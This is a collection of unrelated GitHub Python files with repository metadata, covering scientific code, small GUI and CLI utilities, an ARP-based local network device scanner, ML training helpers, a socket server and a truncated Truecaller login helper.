the given immediate depending on it's data type and return it as formatted string\"\"\"\r\n # Handle the immediate\r\n if isinstance(imm, int):\r\n imm = handle_int(imm)\r\n elif isinstance(imm, float):\r\n imm = handle_float(imm)\r\n elif isinstance(imm, str):\r\n imm = handle_string(imm)\r\n\r\n # Return the formatted immediate\r\n return imm\r\n\r\n\r\ndef format_classname(classname, instr_hex, str_to_write=''):\r\n \"\"\"Extract all data needed from hex-instructions to format the ASM-instruction\"\"\"\r\n if '_' in classname:\r\n classname = classname.replace(\"_\", \" \")\r\n if 'RA' in classname:\r\n # Extract from hex-instruction 0xXXAB A-registry 'A'\r\n classname = classname.replace(\"RA\", \"RA:\" + instr_hex[4])\r\n if 'RB' in classname:\r\n # Extract from hex-instruction 0xXXAB B-registry 'B'\r\n classname = classname.replace('RB', \"RB:\" + instr_hex[5])\r\n if 'imm' in classname:\r\n # Extract from hex-instruction 0xXXAB CCCC immediate 'CCCC'\r\n classname = classname.replace('imm', str(int(instr_hex[-4:], 16)))\r\n if 'EBP p' in classname:\r\n classname = classname.replace('EBP p ', '[EBP + ').replace(classname[-4:], classname[-4:] + \"]\")\r\n if 'str' in classname:\r\n classname = classname.replace('str', \"'\" + str_to_write + \"'\").replace('\\n', '\\\\n')\r\n\r\n return classname\r\n\r\n\r\ndef calculate_indentation(indent_size, instr_counter):\r\n \"\"\"Calculates the indentation needed and returns it as string\"\"\"\r\n return \" \" * (len(str(indent_size)) - len(str(instr_counter)))\r\n\r\n\r\ndef write(str_input, path, filename):\r\n \"\"\"Write the input into the @filename\"\"\"\r\n with open(path + filename, \"w\") as file:\r\n file.write(str_input)\r\n\r\n\r\ndef format_hexstring_instr(long_str, newlines_num=6):\r\n \"\"\"Print a long string creating @newlines_num lines (default 6 lines)\"\"\"\r\n instr_list = split_with_space(long_str)\r\n\r\n output_str = \"\"\r\n instr_num = len(instr_list)\r\n instr_per_line = instr_num // newlines_num\r\n\r\n for num, value in enumerate(instr_list):\r\n if num < 2:\r\n output_str += value + \" \"\r\n else:\r\n current_instr = num - 2\r\n if current_instr % instr_per_line == 0:\r\n output_str += \"\\n\" + value + \" \"\r\n else:\r\n output_str += value + \" \"\r\n\r\n return output_str\r\n\r\n\r\ndef split_with_space(input_str):\r\n \"\"\"Split @input_str with space and format 'v2.0 raw\\n'\"\"\"\r\n output_str = input_str.split(\" \")\r\n\r\n for num, element in enumerate(output_str):\r\n if 'raw\\n' in element:\r\n n_elements = element.split(\"\\n\")\r\n del output_str[num]\r\n for key, obj in enumerate(n_elements):\r\n output_str.insert(num + key, obj)\r\n\r\n return output_str\r\n\r\n\r\ndef convert_chars_hex(char):\r\n \"\"\"Convert char to ASCII-hex-value of it without '0x' \"\"\"\r\n hex_string = str(hex(ord(char))[2:])\r\n while len(hex_string) < 4:\r\n hex_string = \"0\" + hex_string\r\n return hex_string\r\n","repo_name":"hamnaanaa/H-Language","sub_path":"PythonCompiler/Rechner/MicroHamudi/Functions/Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":6324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27574383308","text":"import time \r\nimport csv \r\nimport pandas as pd \r\n\r\ndef time_convert(sec):\r\n mins = sec // 60\r\n sec = sec % 60\r\n hours = mins // 60\r\n mins = mins % 60\r\n print(\"Time Lapsed = {0}:{1}:{2}\".format(int(hours),int(mins),sec))\r\n\r\ninput(\"Press Enter to start\")\r\nstart_time = time.time()\r\n\r\ninput(\"Press Enter to stop\")\r\nend_time = time.time()\r\ntime_lapsed = end_time - start_time\r\nduration = time_convert(time_lapsed)\r\n\r\ndf =pd.read_csv('data.csv')\r\ndf = pd.DataFrame(df)\r\n\r\ndata = {start_time, end_time , duration}\r\n\r\n\r\nheader = ['start_time ', 'end_time ', 'duration ']\r\n\r\ndata = dict(zip(('start_time ', 'end_time ', 'duration '),(start_time, end_time, time_lapsed)))\r\nwith open('data.csv', 'a') as f:\r\n writer = csv.DictWriter(f, fieldnames= header)\r\n\r\n writer.writerow(data)\r\n\r\n f.close()\r\n\r\n\r\n","repo_name":"limzishen/StudyApp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6604326914","text":"import os\r\nfrom time import sleep\r\nimport app.constants.constants as const\r\nfrom app.entities.ShopEntity import ShopEntity\r\nfrom app.repository.DBManager import DBManager\r\nfrom app.repository.ShopRepository import ShopRepository\r\nfrom app.repository.UserRepository import UserRepository\r\nimport app.utils.LogHandler as logging\r\nimport csv\r\n\r\n\r\nclass FileManager(object):\r\n\r\n def __init__(self, dbManager: DBManager):\r\n self.logger = logging.getLogger(self.__class__.__name__)\r\n self.dbManager = dbManager\r\n\r\n def execute(self):\r\n self.dbManager.connect()\r\n\r\n userRepository = UserRepository(self.dbManager)\r\n shopRepository = ShopRepository(self.dbManager)\r\n\r\n users_to_insert, users_to_relation = self.readUsersCSV()\r\n shops_to_insert, shops_to_relation = self.readShopsCSV()\r\n \r\n usersInserted = userRepository.insert_many(users_to_insert, users_to_relation, shops_to_relation)\r\n shopsInserted = shopRepository.insert_many(shops_to_insert)\r\n\r\n if usersInserted and shopsInserted:\r\n shopRepository.insert_shops_users(users_to_relation)\r\n shopRepository.insert_shops_categories(shops_to_relation)\r\n\r\n shopRepository.insert_shops_root_directory(shops_to_insert)\r\n\r\n \r\n\r\n self.dbManager.close()\r\n\r\n def readShopsCSV(self):\r\n shops_to_insert: list[ShopEntity] = []\r\n shops_to_relation: list[ShopEntity] = []\r\n try:\r\n self.logger.info('Looking for shops file...')\r\n\r\n filePath = f'{const.ROOT_PATH}/app/input/shops.csv'\r\n \r\n resultDictShops = []\r\n shop_ids = []\r\n resultDictRelation = []\r\n\r\n with open(filePath) as f:\r\n for row in csv.DictReader(f, skipinitialspace=True, delimiter=';'):\r\n newDict = {}\r\n for k, v in row.items():\r\n newDict[k] = str(v)\r\n\r\n resultDictRelation.append(newDict)\r\n\r\n # not append duplicate mrkl_shop_id\r\n if const.SHOP_ID in newDict and newDict[const.SHOP_ID] not in shop_ids:\r\n resultDictShops.append(newDict)\r\n if const.SHOP_ID in newDict:\r\n shop_ids.append(newDict[const.SHOP_ID])\r\n\r\n for result in resultDictShops:\r\n newShop = ShopEntity(result)\r\n shops_to_insert.append(newShop)\r\n \r\n for result in resultDictRelation:\r\n newShop = ShopEntity(result)\r\n shops_to_relation.append(newShop)\r\n\r\n sleep(1)\r\n if os.path.exists(filePath):\r\n os.remove(filePath)\r\n return shops_to_insert, shops_to_relation\r\n except Exception as e:\r\n self.logger.warning('There is not shops file to read')\r\n print(e)\r\n return shops_to_insert, shops_to_relation\r\n \r\n def readUsersCSV(self):\r\n users_to_insert: list[ShopEntity] = []\r\n users_to_relation: list[ShopEntity] = []\r\n try:\r\n self.logger.info('Looking for users file...')\r\n\r\n filePath = f'{const.ROOT_PATH}/app/input/users.csv'\r\n \r\n resultDictUsers = []\r\n resultDictRelation = []\r\n user_emails = []\r\n\r\n with open(filePath) as f:\r\n for row in csv.DictReader(f, skipinitialspace=True, delimiter=';'):\r\n newDict = {}\r\n for k, v in row.items():\r\n newDict[k] = str(v)\r\n\r\n resultDictRelation.append(newDict)\r\n\r\n # not append duplicate user_codes\r\n if const.USER_EMAIL in newDict and newDict[const.USER_EMAIL] not in user_emails:\r\n resultDictUsers.append(newDict)\r\n if const.USER_EMAIL in newDict:\r\n user_emails.append(newDict[const.USER_EMAIL])\r\n\r\n for result in resultDictUsers:\r\n newUser = ShopEntity(result)\r\n users_to_insert.append(newUser)\r\n\r\n for result in resultDictRelation:\r\n newShop = ShopEntity(result)\r\n users_to_relation.append(newShop)\r\n\r\n sleep(1)\r\n if os.path.exists(filePath):\r\n os.remove(filePath)\r\n return users_to_insert, users_to_relation\r\n except Exception as e:\r\n self.logger.warning('There is not users file to read')\r\n print(e)\r\n return users_to_insert, users_to_relation\r\n","repo_name":"DiegoSullon/migrator-demon","sub_path":"app/manager/FileManager.py","file_name":"FileManager.py","file_ext":"py","file_size_in_byte":4639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17712178961","text":"'''\nContains examples of standard likelihood functions for usage in the package.\n'''\nimport numpy as np\n\ndef isotropic_gaussian(q):\n '''\n An isotropic Gaussian likelihood function.\n\n Parameters\n ----------\n q : numpy array\n Position parameter\n\n\n Returns\n -------\n r : dictionary\n returns the log likelihood under the ``llh`` key, and the gradient under the ``grad`` key.\n '''\n\n llh = -np.sum(q * q) / 2\n grad = -q\n\n return {\"llh\": llh, \"grad\": grad}\n\n\ndef blr(q, data, t, idxs=None, alpha=100 ):\n '''\n Bayesian Logistic Regression with a Gaussian prior.\n\n Parameters\n ----------\n q : numpy array\n Position parameter\n data : numpy array\n A (N,d) array, where the d datapoints have dimensionality N.\n t : numpy array\n A (1,d) binary array of indicator values\n idxs : list or iterable, optional\n A list of indexes to use in the BLR calculation\n alpha : float, optional\n The variance of the Gaussian prior, default 100.\n\n\n Returns\n -------\n r : dictionary\n returns the log likelihood under the ``llh`` key, the gradient under the ``grad`` key and the gradients for each data point are given in ``grad_data``.\n '''\n\n Ndata = data.shape[1]\n\n if idxs is None:\n idxs = np.arange(Ndata)\n\n X = data[:, idxs].T\n t = t[:, idxs].T\n\n # Prior\n Vprior = -0.5 * np.sum(q ** 2) / alpha\n Fprior = -q / alpha\n\n # Posterior\n tv = np.dot(X, q)\n exptv = np.exp(-tv)\n\n VV = tv * t - np.log(1 + exptv) - tv\n\n #V = np.sum(tv * t) - np.sum(np.log(1 + exptv)) - np.sum(tv)\n F = X * (t - 1.0 / (1.0 + exptv))\n\n TotalV = (np.sum(VV) + Vprior)\n\n TotalF = (Ndata * np.mean(F, 0, keepdims=True) + Fprior.T).T\n\n return {\"llh\": TotalV, \"llh_data\":VV , \"grad\": TotalF, \"grad_data\": F.T}\n","repo_name":"c-matthews/racecar","sub_path":"src/racecar/llh.py","file_name":"llh.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"34325659310","text":"import math\n\n\ndef get_сauchy_equation(task_number):\n if task_number == 1:\n return lambda x, y: x ** 2 + y, lambda c, x: c * math.e ** x - x ** 2 - 2 * x - 2 \\\n , lambda x, y: (y + x ** 2 + 2 * x + 2) / (math.e ** x)\n if task_number == 2:\n return lambda x, y: y + math.cos(x), lambda x, c: math.sin(x) * 0.5 - math.sin(x) * 0.5 + c * math.e ** x, \\\n lambda x, y: (-math.sin(x) * 0.5 + math.sin(x) * 0.5 + y) / (math.e ** x)\n if task_number == 3:\n return lambda x, y: (2 * y) + x ** 2, lambda x, c: c * math.e ** (2 * x) - (x ** 2) * 0.5 - x / 2 - 1 / 4, \\\n lambda x, y: (y + (x ** 2) * 0.5 + x / 2 + 1 / 4) / (math.e ** (2 * x))\n\n\ndef enter_value(text):\n while True:\n try:\n x = float(input(f\"Введите {text}: \"))\n return x\n except:\n print(\"Некоректный ввод\")\n\n\ndef get_data():\n while True:\n try:\n print(\"1 y' = x^2 + y\\n2 y' = y + cos(x)\\n3 y' = (2 * y) + x^2\")\n task_number = int(input(\"Выберите задачу Коши: \"))\n if task_number >= 1 and task_number <= 3:\n equation1, equation2, equation3 = get_сauchy_equation(task_number)\n break\n else:\n print(\"Нет такой задачи\")\n\n except:\n print(\"Некорректный ввод\")\n x0 = enter_value(\"x0\")\n y0 = enter_value(\"y0\")\n while True:\n try:\n borders = tuple(map(float, input(\"Введите границы интервала a и b: \").strip().split()))\n\n if borders[0] < borders[1]:\n break\n else:\n print(\"Левая граница должна быть меньше правой\")\n except:\n print(\"Некорректный ввод\")\n h = -1\n while h <= 0:\n h = enter_value(\"шаг h\")\n if h <= 0:\n print(\"h должно быть >0\")\n a = -1\n while a <= 0:\n a = enter_value(\"точность, например, 0.01\")\n if a <= 0:\n print(\"a должно быть >0\")\n\n return {\"a\": borders[0], \"b\": borders[1], \"x0\": x0, \"y0\": y0, \"h\": h, \"accuracy\": a, \"equation1\": equation1,\n \"equation2\": equation2, \"equation3\": equation3}\n","repo_name":"wizarsi/calculative-math","sub_path":"calculative-math-lab6/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21899858070","text":"#!/usr/bin/python3\n\"\"\"\nscoregui.py handle score.py3 configuration.\n\"\"\"\n\nimport configparser\nimport glob\nfrom tkinter import *\nfrom tkinter import ttk\nimport os\n\nconfig = configparser.ConfigParser()\nconfig.read('score.ini')\n\n# directory of problems to score\nproblemFiles = config['Paths']['ProblemFiles']\n# directory of reference answers\nanswerFiles = config['Paths']['AnswerFiles']\n# filename of HTML output\nHTML = config['Paths']['HTMLOutput']\ncss = config['Paths']['cssOutput']\nRefresh = config['HTML']['Refresh']\n# Elegance bonus multipler\nElegance = config.getint('Bonus','Elegance',fallback=1)\n# Read in Bonus Points\nBPList = config['Bonus']['BP']\nBonusPoints = [(x.split(',')[0].strip(),\n x.split(',')[1].strip(),\n int(x.split(',')[2])) for x in BPList.split(':')]\n\n# extract the problem numbers BonusPoint, to be used to test for valid problems\nproblist = [pnum for pnum,pname,ppt in BonusPoints]\n\n# find the elegance files\n# the list entries will look like '01-JGH'\nele = [x.split('/')[-1].split('.')[0].upper() for x in glob.glob(problemFiles+'*.[eE][lL][eE]')]\n\n# DefaultPoints is the list of possible problems, from 00 to 99.\nDefaultPoints = [(\"{:0>2d}\".format(q), '', 1) for q in range(0,100)]\n\n# Team names\nTeams = set(x.split('/')[-1].split('.')[0].split('-')[1].upper() for x in glob.glob(problemFiles+'*.*'))\n\ndef test(*args):\n ''' callback procedure for checkbox changes '''\n #print (args, chkbtn[args[0]], intvar_dict[chkbtn[args[0]]].get())\n team_name = chkbtn[args[0]]\n team_state = intvar_dict[chkbtn[args[0]]].get()\n \n if team_state:\n #print('enable')\n files = open(problemFiles+'00-'+team_name+'.ELE','a')\n files.close()\n else:\n #print('disable')\n os.remove(problemFiles+'00-'+team_name+'.ELE')\n \n #for key, value in intvar_dict.items():\n # if value.get():\n # print('selected:', key, value, value.get())\n\nroot = Tk()\nroot.title('Score Settings')\n\nmainframe = ttk.Frame(root, padding=\"3 3 12 12\")\nmainframe.grid(column=0, row=0, sticky=(N, W, E, S))\nmainframe.columnconfigure(0, weight=1)\nmainframe.rowconfigure(0, weight=1)\nttk.Label(mainframe, text=\"Mark Teams\",background='white').grid(column=0, row=0, sticky=(W, E))\n\n# set up the checkbuttons and link to vars\nintvar_dict = {}\nj = 1\nfor t in Teams:\n j += 1\n # create the tk linked variable\n intvar_dict[t] = IntVar()\n # create the checkbox for team t and wire it to the tk linked variable\n c = ttk.Checkbutton(mainframe, text=t, variable=intvar_dict[t])\n # if there's an elegance file, set the checkbutton\n if '00-'+t in ele:\n intvar_dict[t].set(1)\n # Set the callback program when the variable changes\n intvar_dict[t].trace(\"w\", test)\n # place the checkbutton on the grid\n c.grid(column=0, row=j, sticky=(W, E))\n\n# chkbtn links teamnames to checkbutton variables\nchkbtn = {}\nfor child in intvar_dict:\n chkbtn[str(intvar_dict[child])] = child\n\n#intvar_dict['WESTVIEW'].set(1)\n\nroot.bind('', test)\nroot.mainloop()\n","repo_name":"jghafa/contest","sub_path":"scoregui.py","file_name":"scoregui.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1615014439","text":"import cv2\r\nimport mediapipe as mp\r\n\r\ncap = cv2.VideoCapture(0)\r\nmpHands = mp.solutions.hands\r\nhands = mpHands.Hands()\r\nmpDraw = mp.solutions.drawing_utils\r\n\r\nwhile True:\r\n success, img = cap.read()\r\n RGBimg = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n results = hands.process(RGBimg)\r\n\r\n if results.multi_hand_landmarks:\r\n for handLms in results.multi_hand_landmarks:\r\n for id, lm in enumerate(handLms.landmark):\r\n #print(id,lm)\r\n h,w,c = img.shape\r\n cx,cy = int(lm.x*w), int(lm.y*h) #prints pixel coordinates\r\n print (id, cx, cy)\r\n\r\n mpDraw.draw_landmarks(img,handLms,mpHands.HAND_CONNECTIONS)\r\n\r\n\r\n cv2.imshow(\"Image\",img)\r\n\r\n if cv2.waitKey(1) & 0xFF == ord('q'): # if 'q' is pressed then quit\r\n break\r\ncap.release()\r\ncv2.destroyAllWindows()","repo_name":"ommpatel3/Finger-Math","sub_path":"fingertest.py","file_name":"fingertest.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"17955126232","text":"import scapy.all as scapy \nfrom src.deviceModel import NetworkDevice\nimport os\n\nclass NetworkScanner:\n def __init__(self, ipAddr_range='192.168.1.1/24', macAddr='ff:ff:ff:ff:ff:ff', timeout=2, verbose=False): # default ip address to home network format\n self.ipAddr_range = ipAddr_range\n self.macAddr = macAddr\n self.timeout = timeout\n self.verbose = verbose\n self.devices = [] # storing device objects\n self.unansweredDevices = []\n\n def scanNetwork(self, save_to_file=True):\n request = scapy.ARP(pdst=self.ipAddr_range)\n broadcast = scapy.Ether(dst=self.macAddr)\n requestBroadcast = broadcast / request\n allDevices = scapy.srp(requestBroadcast, timeout=self.timeout, verbose=self.verbose)\n answeredDevices = allDevices[0]\n unansweredDevices = allDevices[1]\n\n for element in answeredDevices:\n device = NetworkDevice(ipAddr= element[1].psrc, macAddr=element[1].hwsrc) # getting the IP and MAC address from the tuple\n self.devices.append(device)\n \n for requestPacket in unansweredDevices: # getting the IP address from the packet\n self.unansweredDevices.append(requestPacket.pdst)\n\n if save_to_file:\n main_directory = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))\n data_directory = f\"{main_directory}/data\"\n\n iplist_file = os.path.join(data_directory, \"iplist.txt\")\n unansweredIP_file = os.path.join(data_directory, \"unanswered-devices.txt\")\n\n\n with open(iplist_file, \"w\") as file:\n for device in self.devices:\n file.write(f\"{device.ipAddr}\\n\")\n \n with open(unansweredIP_file, \"w\") as file:\n for ip in self.unansweredDevices:\n file.write(f\"{ip}\\n\")\n\n \n ","repo_name":"gmturn/vulnerability-scanner","sub_path":"src/networkModel.py","file_name":"networkModel.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36689020595","text":"import numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom keras import backend as K\nimport matplotlib.pyplot as plt\nimport itertools\n\n'''\nDefine the metric Precision\nPercentage of correct classifications from all values classified as positive\n'''\ndef precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision\n\n'''\nDefine the metric Recall\nPercentage of positive classes correctly classified\n'''\ndef recall(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))\n recall = true_positives / (possible_positives + K.epsilon())\n return recall\n\n'''\nDefine Dice loss function\n'''\ndef dice_loss(y_true, y_pred, smooth=1e-6):\n # convert types\n y_true = tf.cast(y_true, tf.float32)\n y_pred = tf.cast(y_pred, tf.float32)\n # Dice coefficient\n intersection = K.sum(K.abs(y_true * y_pred), axis=-1)\n coefficient = (2. * intersection + smooth) / (K.sum(K.square(y_true),-1) + K.sum(K.square(y_pred),-1) + smooth)\n # Dice loss\n return 1 - coefficient\n\n'''\nCompile model and fit it to data\n'''\ndef compile_fit(model, loss, config, x_train, y_train, x_val, y_val):\n learning_rate, epochs, batch_size = config\n # compile model\n if loss == 'binary_crossentropy':\n model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=learning_rate), \n loss='binary_crossentropy',\n metrics=[precision, recall])\n elif loss == 'dice':\n model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=learning_rate), \n loss=dice_loss,\n metrics=[precision, recall])\n # fit model to data\n history = model.fit(x_train, y_train, \n validation_data=(x_val, y_val), \n epochs=epochs, batch_size=batch_size, shuffle=True)\n # plot learning curves\n plot_learning_curves(history.history['loss'], history.history['val_loss'])\n return model\n\n'''\nPredict changes from a pair of images\n'''\ndef predict_changes(model, images, image_size):\n # reshape input data to fit the model\n input_data = images.reshape(-1, image_size, image_size, 2)\n # predict changes\n prediction = model.predict(input_data)\n prediction = prediction > 0.5\n prediction = prediction.reshape(image_size, image_size)\n return prediction\n\n'''\nPlot learning curves\n'''\ndef plot_learning_curves(loss, val_loss):\n epochs = range(1, len(loss) + 1)\n plt.plot(epochs, loss, 'y', label='Training loss')\n plt.plot(epochs, val_loss, 'r', label='Validation loss')\n plt.title('Training and validation loss')\n plt.xlabel('Epochs')\n plt.ylabel('Loss')\n plt.legend()\n plt.show()\n\n'''\nGenerate hiperparameters configurations\n'''\ndef generate_configs(learning_rate, epochs, batch_size):\n configs = [learning_rate, epochs, batch_size]\n configs = list(itertools.product(*configs))\n print('Generated %s different configurations' % (len(configs)))\n return configs \n\n'''\nGrid Search for hiperparameters\n'''\ndef grid_search(model, loss, configs, x_train, y_train, x_val, y_val, x_test, y_test):\n # evaluate configs\n df_scores = pd.DataFrame(columns = ['learning_rate', 'epochs', 'batch_size', 'loss', 'precision', 'recall'])\n for config in configs:\n model = compile_fit(model, loss, config, x_train, y_train, x_val, y_val)\n metrics = model.evaluate(x_test, y_test)\n new_row = {'learning_rate':config[0], 'epochs':config[1], 'batch_size':config[2], 'loss':metrics[0], 'precision':metrics[1], 'recall':metrics[2]}\n df_scores = df_scores.append(new_row, ignore_index=True)\n # store scores\n df_scores.to_csv('./scores.csv')","repo_name":"Gonkalos/LEI","sub_path":"Code/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":3965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25942121076","text":"\"\"\"Collection of benchmarks and downstream tasks on embeddings\n\n.. autosummary::\n :toctree: _autosummary\n\n analogy\n categorization\n language_modeling\n outliers\n relation_extraction\n sequence_labeling\n similarity\n synonymy_detection\n text_classification\n\n\"\"\"\n\nimport argparse\nimport importlib\nfrom vecto.embeddings import load_from_dir\nfrom vecto.data import Dataset\nimport os\nfrom vecto.utils.data import save_json, print_json\nfrom vecto.utils import get_time_str\n\n\ndef list_benhcmarks(benchmarks):\n print(\"available benchmarks:\")\n for i in benchmarks:\n print(i)\n\n\ndef choose_benchmark(args):\n # TODO: load benchmark names from modules themselves\n available_benchmarks = []\n available_benchmarks.append(\"analogy\")\n available_benchmarks.append(\"categorization\")\n available_benchmarks.append(\"language_modeling\")\n available_benchmarks.append(\"relation_extraction\")\n available_benchmarks.append(\"similarity\")\n available_benchmarks.append(\"sequence_labeling\")\n available_benchmarks.append(\"text_classification\")\n\n parser = argparse.ArgumentParser(\n description='run benchmarks',\n add_help=True,\n usage=\"vecto benchmark [name]\")\n\n parser.add_argument('name', help='Subcommand to run')\n args, remaining_args = parser.parse_known_args(args)\n if args.name == \"help\":\n list_benhcmarks(available_benchmarks)\n return\n # TODO: implement running set of benchmarks defined in config\n # if args.name == \"all\":\n # print(\"running all benchmarks\")\n\n if args.name in available_benchmarks:\n #print('ramaining args')\n #print(remaining_args)\n run_benchmark_by_name(args.name, remaining_args)\n else:\n print(\"unknown benchmark name\", args.name)\n list_benhcmarks(available_benchmarks)\n exit(-1)\n\n\ndef save_results(results, path_out, dataset_name):\n # create subdirs unless explicitly asked to not do so\n # TODO: add submodules to append to path\n timestamp = get_time_str()\n if isinstance(results, list):\n task = results[0][\"experiment_setup\"][\"task\"]\n else:\n task = results[\"experiment_setup\"][\"task\"]\n task = task.replace(\" \", \"_\")\n name_file_out = os.path.join(path_out,\n task,\n dataset_name,\n timestamp,\n \"results.json\")\n save_json(results, name_file_out)\n\n\ndef run_benchmark_by_name(name, args):\n print(name, args)\n print(\"running \", name)\n mod = importlib.import_module(\"vecto.benchmarks.\" + name)\n parser = argparse.ArgumentParser()\n add_extra_args = getattr(mod, 'add_extra_args')\n add_extra_args(parser)\n parser.add_argument(\"--path_out\",\n default=None,\n help=\"destination folder to save results\")\n args = parser.parse_args(args)\n dict_args = vars(args)\n embeddings = load_from_dir(args.embeddings)\n # TODO: this is ugly hack, do subparsers or something\n if name == \"language_modeling\":\n dataset = Dataset(\"/tmp/\")\n dataset.name = \"ptb\"\n else:\n dataset = Dataset(args.dataset)\n dict_args.pop(\"dataset\")\n\n dict_args.pop(\"embeddings\")\n # TODO: not sure if all banchmarks use dataset arg\n path_out = dict_args.pop(\"path_out\")\n Benchmark = getattr(mod, \"Benchmark\")\n benchmark = Benchmark(**dict_args)\n\n print(\"SHAPE:\", embeddings.matrix.shape)\n print(\"vocab size:\", embeddings.vocabulary.cnt_words)\n results = benchmark.run(embeddings, dataset)\n if path_out:\n save_results(results, path_out, dataset.metadata[\"name\"])\n else:\n print_json(results)\n\n\ndef run_benchmarks_cli(args=[]):\n choose_benchmark(args)\n","repo_name":"vecto-ai/vecto","sub_path":"vecto/benchmarks/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3789,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"21"} +{"seq_id":"40395482833","text":"import unicodedata\nfrom collections import defaultdict\nfrom pprint import pprint\n\nDEFAULT_NAME = ''\nLETTER_PREFIX = 'L'\nNAME_FILTERS = ['cyrillic', 'greek']\n\n# http://vietunicode.sourceforge.net/charset/\nVIETNAMESE_RANGES = [\n range(0x0000, 0x007F + 1), # basic latin\n range(0x0080, 0x00FF + 1), # latin-1 supplement\n range(0x0100, 0x024F + 1), # latin extended A and B\n range(0x1E00, 0x1EFF + 1), # Latin Extended Additional\n range(0x0300, 0x036F + 1), # Combining Diacritical Marks\n range(0x20AB, 0X20AB + 1) # Dong currency symbol\n]\n\n# http://www.fileformat.info/info/unicode/block/index.htm\nCJK_RANGES = [\n range(0x4E00, 0x9FFF + 1),\n range(0x2E80, 0x2EFF + 1),\n range(0x3000, 0x303F + 1),\n range(0x31C0, 0x31EF + 1),\n range(0x3200, 0x32FF + 1),\n range(0x3300, 0x33FF + 1),\n range(0x3400, 0x4DBF + 1),\n range(0xF900, 0xFAFF + 1),\n range(0xFE30, 0xFE4F + 1),\n range(0x20000, 0x2A6DF + 1),\n range(0x2A700, 0x2B73F + 1),\n range(0x2B740, 0x2B81F + 1),\n range(0x2B820, 0x2CEAF + 1),\n range(0x2F800, 0x2FA1F + 1)\n]\n\nRANGES = {\n 'vietnamese': VIETNAMESE_RANGES,\n 'braille': [range(0x2800, 0x28FF + 1)],\n 'arabic': [range(0x0600, 0x06FF + 1)],\n 'cjk': CJK_RANGES\n}\n\ndef get_specific_category(character_number):\n for category_name, ranges in RANGES.items():\n for unicode_range in ranges:\n if character_number in unicode_range:\n return category_name\n\n return None\n\nwith open('znaki_wikipedii.txt') as f:\n lines = f.readlines()\n\ncategories = defaultdict(lambda: set())\n\nfor line in lines:\n for character in line:\n category = unicodedata.category(character)\n character_name = unicodedata.name(character, DEFAULT_NAME).lower()\n character_number = ord(character)\n\n specific_category = get_specific_category(character_number)\n if specific_category:\n categories[specific_category].add(character)\n if specific_category != 'vietnamese':\n continue\n\n if category[0] == LETTER_PREFIX:\n for name in NAME_FILTERS:\n if name in character_name:\n category += ' ' + name\n\n categories[category].add(character)\n\nfor category in sorted(categories):\n pprint('{}: {}'.format(category, ' '.join(sorted(categories[category]))), width=80)\n","repo_name":"florczakraf/tm2017","sub_path":"l01/z2/z2.py","file_name":"z2.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2484024491","text":"#!/usr/bin/env python3\n\n# Sockets Tutorial with Python 3 part 1 - sending and receiving data: https://youtu.be/Lbfe3-v7yE0\n# https://docs.python.org/3/library/socket.html\n\nimport socket\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nprint(socket.gethostname(), 9998)\ns.bind((socket.gethostname(), 9998))\n\ns.listen(5)\n\nwhile True:\n\tclientsocket, address = s.accept()\n\tprint(f\"Connection from {address} has been established!\")\n\n\tclientsocket.send(bytes(\"Welcome to the server!\", \"utf-8\"))\n\n\tclientsocket.close()\n","repo_name":"a2gs/pythonStudy","sub_path":"pyTCPClientServer/server1.py","file_name":"server1.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31557189410","text":"import random\nimport requests\nfrom typing import Dict, List, Union\nimport phonenumbers\nfrom phonenumbers import parse as parse_phone_number\nfrom phonenumbers.phonenumberutil import region_code_for_country_code\nfrom ..data.phones_list import get_random_device\n\ndef generate_random_string(length: int) -> str:\n \"\"\"\n Generate a random string of the given length.\n\n Args:\n length (int): The length of the random string.\n\n Returns:\n str: The generated random string.\n \"\"\"\n characters = \"abcdefghijklmnopqrstuvwxyz0123456789\"\n return ''.join(random.choice(characters) for _ in range(length))\n\n\ndef login(phone_number: str) -> Dict[str, Union[str, int]]:\n \"\"\"\n Login to Truecaller.\n\n Args:\n phone_number (str): Phone number in international format.\n\n Returns:\n dict: The login response containing the requestId used for OTP verification.\n\n Raises:\n ValueError: If the phone number is invalid.\n requests.exceptions.RequestException: If an error occurs during the API request.\n \"\"\"\n pn = 